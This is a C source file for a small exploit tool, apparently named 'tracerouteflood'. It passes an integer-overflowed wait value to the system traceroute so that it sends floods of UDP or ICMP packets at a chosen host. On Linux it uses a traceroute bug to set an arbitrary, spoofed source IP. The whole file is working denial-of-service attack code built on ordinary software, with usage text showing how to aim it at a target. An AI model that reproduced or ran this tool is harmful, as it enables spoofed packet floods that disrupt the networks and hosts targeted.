#include<stdio.h>
#include<unistd.h>
#include<sys/types.h>
#include<sys/wait.h>
#include<string.h>



#define TRACEROUTE "/usr/sbin/traceroute"      /* traceroute's pathname  */
#define MAX_LENGHT      12                    /* buffer dimension   */



int
usage(char *argo)
{
  printf("usage: %s: %s [-I] [-f first_ttl] [-q nqueries] [-s source_ip] hostname [packetlen]\n",argo,argo);
  printf("\t -I\t\tflood using ICMP ECHO instead of UDP datagrams.\n");
  printf("\t -f firt_ttl\tthe initial time-to-live used in the first outgoing packet\n");
  printf("\t -q nqueries\tqueries number\n");
  printf("\t -s source_ip\tthis ip is the address of the outgoing packets\n");
  printf("\n\t(-I and -f switches works only with traceroute 1.4 or higher)\n");
  printf("\t[source_ip] can be arbitrary only on linux\n");
  printf("\n\tFor example:./tracerouteflood -I -f 2 -q 8 -s xxx.xxx.xxx.xxx dest.somewhere.com 1460\n");

return 1;
}



int
main(int argc, char **argv )
{
        char            badwait[MAX_LENGHT];
        pid_t           pid_traceroute;
        register int    op;
        int             i,j;

        char *cmdline[10]={};

        if (argc < 2 || argc > 10 ) exit(usage(argv[0]));


#ifdef __alpha__
/* an integer overflow */
/* please, if ((1<<(sizeof(int)*8)-1)-1) isn't enought on your system */
/* repleace it  with just a big number (don't forget to mail me :) */

        sprintf(badwait,"%ld",((1<<(sizeof(int)*8)-1)-1)  );
#else
        snprintf(badwait,MAX_LENGHT,"%ld",((1<<(sizeof(int)*8)-1)-1)  );
#endif



        opterr=0;
        while ((op = getopt(argc, argv, "If:q:s:")) != EOF)
                switch (op) {
                
                case  'I':
                        cmdline[1]=argv[optind-1];
                        break;
                case  'f':
                        cmdline[2]=argv[optind-2];
                        cmdline[3]=argv[optind-1];
                        break;
                case  'q':
                        cmdline[4]=argv[optind-2];
                        cmdline[5]=argv[optind-1];
                        break;
                case  's':

/* if you have noticed -s bug also on other systems then linux let free to add */
/* here the symbol for the preprocessor (and don't forget to mail me:) */

                        #ifdef __linux__
                                cmdline[6]=argv[optind-2];
                                cmdline[7]=argv[optind-1];
                        #else
                                printf("since now this bug appeare to be present only on linux\n");
                                exit(1);
                        #endif
                        break;
                default:
                        exit(usage(argv[0]));
                        break;
                }



        switch (argc - optind) {

        case 1:
                cmdline[8]=argv[optind];
                break;
        case 2:
                cmdline[8]=argv[optind];
                cmdline[9]=argv[optind+1];
                break;
        default:
                exit(usage(argv[0]));
        }




        for (i=1;i<9;i++){
                if (cmdline[i] == NULL && cmdline[i+1] != NULL) {
                        for(j=i;j<9;j++){
                                cmdline[j]=cmdline[j+1];
                                cmdline[j+1]=(char *) NULL;
                        }
                i=0;
                }
        }                       


        pid_traceroute = fork();
        if ( pid_traceroute == 0) {
        
execl(TRACEROUTE,"traceroute","-w",badwait,cmdline[1],cmdline[2],cmdline[3],cmdline[4],cmdline[5],cmdline[6],cmdline[7],cmdline[8],cmdline[9],NULL);
                perror("exec: maybe traceroute is not in pre-arranged directory");
                exit(1);
        }


        if ( waitpid(pid_traceroute, NULL, 0) < 0) {
                printf("wait error\n");
                exit(1);
                }

        
        printf("done\n");
        exit(0);
}
